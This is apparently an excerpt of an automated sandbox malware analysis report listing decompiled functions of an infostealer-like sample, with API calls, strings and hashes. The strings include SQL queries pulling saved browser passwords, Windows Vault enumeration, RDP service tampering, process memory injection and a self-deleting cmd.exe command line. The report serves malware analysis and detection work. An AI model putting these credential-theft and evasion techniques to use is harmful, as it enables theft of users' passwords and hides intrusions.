                                                                            • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 004100A4
                                                                            • GetCurrentProcess.KERNEL32(00426610,00000000,00000000,00000002,?,00000000), ref: 004100BD
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100C3
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 004100C6
                                                                            • GetCurrentProcess.KERNEL32(00426614,00000000,00000000,00000002,?,00000000), ref: 004100DB
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 004100E1
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00410137
                                                                            • CreateThread.KERNEL32 ref: 00410157
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 004100E4
                                                                              • Part of subcall function 004101AB: CloseHandle.KERNEL32(00426618,00426608,0040FFFB,?,00000000,00402BC7,00000000,exit,00000000,start), ref: 004101B5
                                                                              • Part of subcall function 0040373F: lstrcpyW.KERNEL32 ref: 00403769
                                                                              • Part of subcall function 0040FDB0: CreateProcessW.KERNEL32 ref: 0040FE02
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                                                            • String ID:
                                                                            • API String ID: 337272696-0
                                                                            • Opcode ID: bee2204493a4bc53444b4e07c688032234b56349314ca8f43c08d651a0757c88
                                                                            • Instruction ID: 45800abd4bc58874337c2637046ca9fcf03b4e80ac058ab55fe317e8ad8503fa
                                                                            • Opcode Fuzzy Hash: bee2204493a4bc53444b4e07c688032234b56349314ca8f43c08d651a0757c88
                                                                            • Instruction Fuzzy Hash: B4416571A40259BBEF10EBA1DC46FEF7B78AF04704F50457AB101B21D1DBBD9A84CA68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040D42D Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 71serviceCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D440
                                                                            • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0040D459
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D466
                                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0040D475
                                                                            • GetLastError.KERNEL32 ref: 0040D47F
                                                                            • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0040D4A0
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B1
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B4
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C4
                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C7
                                                                              • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                                                              • Part of subcall function 00401099: RtlFreeHeap.NTDLL(00000000), ref: 004010A6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                                                            • String ID: ServicesActive
                                                                            • API String ID: 1929760286-3071072050
                                                                            • Opcode ID: cd1e18646101d5c1bab72bb6f7b1f33bedb6a16cea768a9159eaaec8da9406aa
                                                                            • Instruction ID: 77105f180dc1f4f583609010b4a2cd32bd7f1b8692fb86ee244d35c389544786
                                                                            • Opcode Fuzzy Hash: cd1e18646101d5c1bab72bb6f7b1f33bedb6a16cea768a9159eaaec8da9406aa
                                                                            • Instruction Fuzzy Hash: B2119071904218BBC7119BB2DC49DDF3FBDEF853607118176F902E2250DB78AE04CAA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040DD72 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 324COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32 ref: 0040DD8F
                                                                              • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                                                            • PathFileExistsW.SHLWAPI(?), ref: 0040DF39
                                                                            • PathFileExistsW.SHLWAPI(?), ref: 0040DDAD
                                                                              • Part of subcall function 0041130F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000,?,?,?,004091CE,?,?,?), ref: 00411326
                                                                              • Part of subcall function 0041130F: GetLastError.KERNEL32(?,?,?,004091CE,?,?,?), ref: 00411334
                                                                            • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E12C
                                                                              • Part of subcall function 0040D856: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                                                            • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0040E01F
                                                                            • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E16C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 1717069549-2896544425
                                                                            • Opcode ID: 553aaf0090f5feb3f3c22ddcefd13520572e594fa31172fea6e6ada5da434d3f
                                                                            • Instruction ID: 55d7e5f8d1f4b9ec0964da3279b74dcd5ea268b2ca2f52e34cb3dca68faebe82
                                                                            • Opcode Fuzzy Hash: 553aaf0090f5feb3f3c22ddcefd13520572e594fa31172fea6e6ada5da434d3f
                                                                            • Instruction Fuzzy Hash: D0B13171504245ABC304EF62CC919EFB7A8BF54348F40093EF552A71D1EB78EA49CB9A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040DB52 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 111registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                                                              • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                                                              • Part of subcall function 004036F7: KiUserExceptionDispatcher.NTDLL ref: 00403732
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0040DB93
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                                                              • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,77C30770,00000000,77C30770,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                              • Part of subcall function 00412554: RegCloseKey.KERNELBASE(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                                                            • StrStrW.SHLWAPI(?,svchost.exe,?,00000000,ImagePath,?), ref: 0040DBF7
                                                                            • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0040DC05
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0040DC22
                                                                            Strings
                                                                            • svchost.exe -k, xrefs: 0040DBFD
                                                                            • ImagePath, xrefs: 0040DBA5
                                                                            • svchost.exe, xrefs: 0040DBEF
                                                                            • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0040DB5E
                                                                            • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DB6E
                                                                            • ServiceDll, xrefs: 0040DC30
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: OpenQueryValuelstrlen$CloseDispatcherExceptionFreeUserVirtual
                                                                            • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                                                            • API String ID: 2553126176-3333427388
                                                                            • Opcode ID: 267ab6dd76fcee10b71947c6f5d4a8ed077f2564fa4eb50ba2571fe93be9b7af
                                                                            • Instruction ID: 0a0d703e0c22a180c861e42df2812f13597edfba14798331e50e127ee1e54c95
                                                                            • Opcode Fuzzy Hash: 267ab6dd76fcee10b71947c6f5d4a8ed077f2564fa4eb50ba2571fe93be9b7af
                                                                            • Instruction Fuzzy Hash: 4C41E631D00119ABDB15EBA2CD92EEEBB79AF14748F50006AF801B21D1EB785F45CA68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00410D2D Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 130comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                                                            • CoInitialize.OLE32(00000000), ref: 00410D4B
                                                                            • CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?,?,?,?,?,?,?,?,?,00402E47), ref: 00410D69
                                                                            • VariantInit.OLEAUT32(?), ref: 00410DED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Initialize$CreateInitInstanceSecurityVariant
                                                                            • String ID: G.@$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                                                            • API String ID: 2382742315-1265846757
                                                                            • Opcode ID: 2d0637be91da55d673d647132b9be97ebe7005386fdf65ad1ddacfa9f9e613cc
                                                                            • Instruction ID: 842cc41d95007274ba15a25a83f44bddffeff0cfe444bad9149d26d573bd0b7d
                                                                            • Opcode Fuzzy Hash: 2d0637be91da55d673d647132b9be97ebe7005386fdf65ad1ddacfa9f9e613cc
                                                                            • Instruction Fuzzy Hash: B141FB70A00209BFCB10DB96CC48EDFBBBDEFC9B14B104459F515EB290D6B5A981CB64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040EE24 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 126filememoryinjectionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                                                            • WriteFile.KERNEL32(?,`@,00426970,00000150,00000000,?,00000000,00000000), ref: 0040EE92
                                                                            • WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                                                            • LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                                                            • LocalFree.KERNEL32(?), ref: 0040EEF6
                                                                            • SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                                                            • ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                                                            • ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$LocalMemoryPointerProcessReadWrite$AllocFree
                                                                            • String ID: `@
                                                                            • API String ID: 3276737649-951712118
                                                                            • Opcode ID: 8c1bceab6731ade4c33151f4d04acfb28625e311108b1c4f57438387646f4cba
                                                                            • Instruction ID: e72bb7fa78d81cf8525c6baf04ae928c9dbf0452580219fbc960ee642851fe31
                                                                            • Opcode Fuzzy Hash: 8c1bceab6731ade4c33151f4d04acfb28625e311108b1c4f57438387646f4cba
                                                                            • Instruction Fuzzy Hash: B5415B35100016FFCB128FAACD8489ABFB5FF0A35071485A2F509EA2B0D736D920DF89
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409244 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 229fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 00409261
                                                                            • GetLastError.KERNEL32 ref: 0040926E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00409275
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00409282
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004092B1
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004092B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseHandle$CreateErrorLastReadSize
                                                                            • String ID: Password$Password
                                                                            • API String ID: 1366138817-7788977
                                                                            • Opcode ID: 02e4cd267d463c9ce01359141e6fee23465ae678a7131a69feae321571df136d
                                                                            • Instruction ID: 0d079fec5c7f131bda1ced3cf5849022ba7cb4fed2040c8ba0bcc6ec81886411
                                                                            • Opcode Fuzzy Hash: 02e4cd267d463c9ce01359141e6fee23465ae678a7131a69feae321571df136d
                                                                            • Instruction Fuzzy Hash: 3F81F270C08246AEEB259B65C891BEE7B74AF09318F54817FE441BA2C3C77D5D828B19
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004146E1 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 175comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 004146F3
                                                                            • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,"BA), ref: 00414720
                                                                            • CoUninitialize.OLE32 ref: 004148A9
                                                                              • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?,74B5B690,00000000,00000000,?,?,00414757), ref: 00414A40
                                                                            • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?), ref: 00414771
                                                                              • Part of subcall function 00414492: CoTaskMemFree.OLE32(?,?,00000000,0041483D), ref: 004144A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateInstance$FreeInitializeTaskUninitialize
                                                                            • String ID: "BA$Grabber$Source$vids
                                                                            • API String ID: 533512943-1720631296
                                                                            • Opcode ID: 9e10a3957bbf15e7499bf9a219475944645554586d18aeaed1ebcb477bdb49d5
                                                                            • Instruction ID: 2c6567443aae3fa2ccd83cd9410249409bd9c9e0b512ace47bdcaa6ee1176714
                                                                            • Opcode Fuzzy Hash: 9e10a3957bbf15e7499bf9a219475944645554586d18aeaed1ebcb477bdb49d5
                                                                            • Instruction Fuzzy Hash: D7517F75A00209AFDB14EFA5C888EEEB7B9FF84305F14846EF915AB250C7759D40CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402A9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106processthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 004124D7: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 004124DE
                                                                            • TerminateThread.KERNEL32(00000000,?,?), ref: 00412D19
                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00412D84
                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00412E0E
                                                                            • CloseHandle.KERNEL32(?), ref: 00412E1D
                                                                            • CloseHandle.KERNEL32(?), ref: 00412E22
                                                                            • ExitProcess.KERNEL32 ref: 00412E25
                                                                            Strings
                                                                            • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 00412D92
                                                                            • Load, xrefs: 00412D3B
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                                                            • String ID: Load$cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                                                                            • API String ID: 3630425516-2018186591
                                                                            • Opcode ID: a37036fcb39aec70da9221bf50b3e7774066a77525dae5cd64983a68ff4d09d9
                                                                            • Instruction ID: 037c922c3f030f8a7e2167b9092222fb162bc460f9f39b1e2300c97669b415f7
                                                                            • Opcode Fuzzy Hash: a37036fcb39aec70da9221bf50b3e7774066a77525dae5cd64983a68ff4d09d9
                                                                            • Instruction Fuzzy Hash: 623167B1900619BFDB11EBA1CD86EEF777DFF04304F004476B205A6191DB78AE948BA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00413EBA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 75sleepprocessmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,77C30770,00000000), ref: 00413ECC
                                                                            • IsWow64Process.KERNEL32(00000000), ref: 00413ED3
                                                                            • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 00413EF7
                                                                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00413F05
                                                                            • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00413F13
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00413F50
                                                                            • Sleep.KERNEL32(000003E8), ref: 00413F5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                                                            • String ID: \System32\cmd.exe
                                                                            • API String ID: 3151064845-2003734499
                                                                            • Opcode ID: ed219067b45a991398468e4a26b8bc153abac1b375d46e51515a851acaccb22f
                                                                            • Instruction ID: afe1c3a2dd0aca87645a04bed0ab53e4b63e38e155d51139ff1440feea8eaa1f
                                                                            • Opcode Fuzzy Hash: ed219067b45a991398468e4a26b8bc153abac1b375d46e51515a851acaccb22f
                                                                            • Instruction Fuzzy Hash: 6D1181B1A04309BFFB109BB59C49FEF767CEB08785F004036F605E6290DA789E458669
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040B87D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56registrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrcpyW.KERNEL32 ref: 0040B8B9
                                                                            • lstrcatW.KERNEL32(?,thunderbird.exe), ref: 0040B8C7
                                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00409E8E,?,00000104,00000000), ref: 0040B8E0
                                                                            • RegQueryValueExW.ADVAPI32(00409E8E,Path,00000000,?,?,?,?,00000104,00000000), ref: 0040B8FD
                                                                            • RegCloseKey.ADVAPI32(00409E8E,?,00000104,00000000), ref: 0040B906
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040B8B3
                                                                            • Path, xrefs: 0040B8F5
                                                                            • thunderbird.exe, xrefs: 0040B8BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                                                            • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                                                            • API String ID: 3135247354-1374996286
                                                                            • Opcode ID: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                                                            • Instruction ID: 3df0df8215fcb83d59d950a1b29e9a277ea2ca522fea2b5b845973b94dc247ed
                                                                            • Opcode Fuzzy Hash: 145a1f37adbbfc8c3e5f119a952875368c6e1147b4b001a2de5ceb485c9eb7eb
                                                                            • Instruction Fuzzy Hash: 7D111EB2A4020CBFDB10EBA5DD49FDA7BBCEB54344F1044B6B605E2190E6749F448BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040BC0D Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 371fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00410C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 00410CBB
                                                                              • Part of subcall function 00403447: lstrcatW.KERNEL32(00000000,77C30770), ref: 00403477
                                                                              • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                                                            • PathFileExistsW.SHLWAPI(00000000,?,00000000,00000000,00000000,.tmp,00000000,004176A4,.tmp,00000000,004176A4,?,00000000), ref: 0040BD0A
                                                                            • PathFileExistsW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0040B9AA), ref: 0040BD14
                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040BD28
                                                                            • CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040BD34
                                                                              • Part of subcall function 0040C63E: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6A8
                                                                              • Part of subcall function 0040C63E: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040BDD0,?,?,00000000,?), ref: 0040C6B1
                                                                              • Part of subcall function 0040C6BD: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040C745
                                                                              • Part of subcall function 0040C6BD: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040C773
                                                                              • Part of subcall function 0040C6BD: LocalFree.KERNEL32(?), ref: 0040C7FB
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,77C30770,?,00405B8D,.bss,00000000), ref: 004034DA
                                                                              • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                                                              • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
                                                                              • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,77C30770,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                                                              • Part of subcall function 0040319E: lstrlenA.KERNEL32(00000000,004031C6,77C30770,00000000,00000000, 6@,004033EE, 6@,00000000,-00000001,77C30770,?,00403620,00000000,?,?), ref: 004031A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
                                                                            • String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
                                                                            • API String ID: 881303001-3832748974
                                                                            • Opcode ID: 0a4873ad1b5136e737e8f5b84b4dde8a0fef772d4d20b99854d86aa9e245b822
                                                                            • Instruction ID: ba20cf8de6aee4928ce48004bd15a5688bda43775cfbd645d5ca8aed8c6f7f47
                                                                            • Opcode Fuzzy Hash: 0a4873ad1b5136e737e8f5b84b4dde8a0fef772d4d20b99854d86aa9e245b822
                                                                            • Instruction Fuzzy Hash: 9AD10B71900109ABDB05EFA6DC92AEEBB79EF44309F10413EF512B61E1DF389A45CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040ACBE Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 54libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(vaultcli.dll,00000000,0040A98E), ref: 0040ACC6
                                                                              • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoadlstrcmp
                                                                            • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                            • API String ID: 2493137890-3967309459
                                                                            • Opcode ID: d22bb24fdbc9040f3830a1c1b40de1b64ce9a1b3d980385fde68668ba647564f
                                                                            • Instruction ID: 2a90ba8d4adaf7cda04c615fa43a8d23c2bd42836fdc2a547e2a1ab5da71d687
                                                                            • Opcode Fuzzy Hash: d22bb24fdbc9040f3830a1c1b40de1b64ce9a1b3d980385fde68668ba647564f
                                                                            • Instruction Fuzzy Hash: 24114235A017018BD7249B71A801BDBB3E6AF85341F54893F986E97781DF38A882CB09
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040EFC1 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41serviceCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,00000000,?,?,?,0040E78B), ref: 0040EFD5
                                                                            • OpenServiceW.ADVAPI32(00000000,TermService,00000004,?,?,?,?,0040E78B), ref: 0040EFEA
                                                                            • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?,?,?,?,?,0040E78B), ref: 0040F001
                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F00A
                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,0040E78B), ref: 0040F011
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_33_2_400000_aspnet_compiler.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Service$CloseHandleOpen$ManagerQueryStatus
                                                                            • String ID: ServicesActive$TermService
                                                                            • API String ID: 2623946379-1374911754
                                                                            • Opcode ID: 197b1eab860f4328633b0e86db24ba8e6b1ce42e5468651c0bef0677bebd7986
                                                                            • Instruction ID: 13b6eb68be2015eef051f6e1ac84f9e35e5ae5cb34c12eee95212088573f76c3
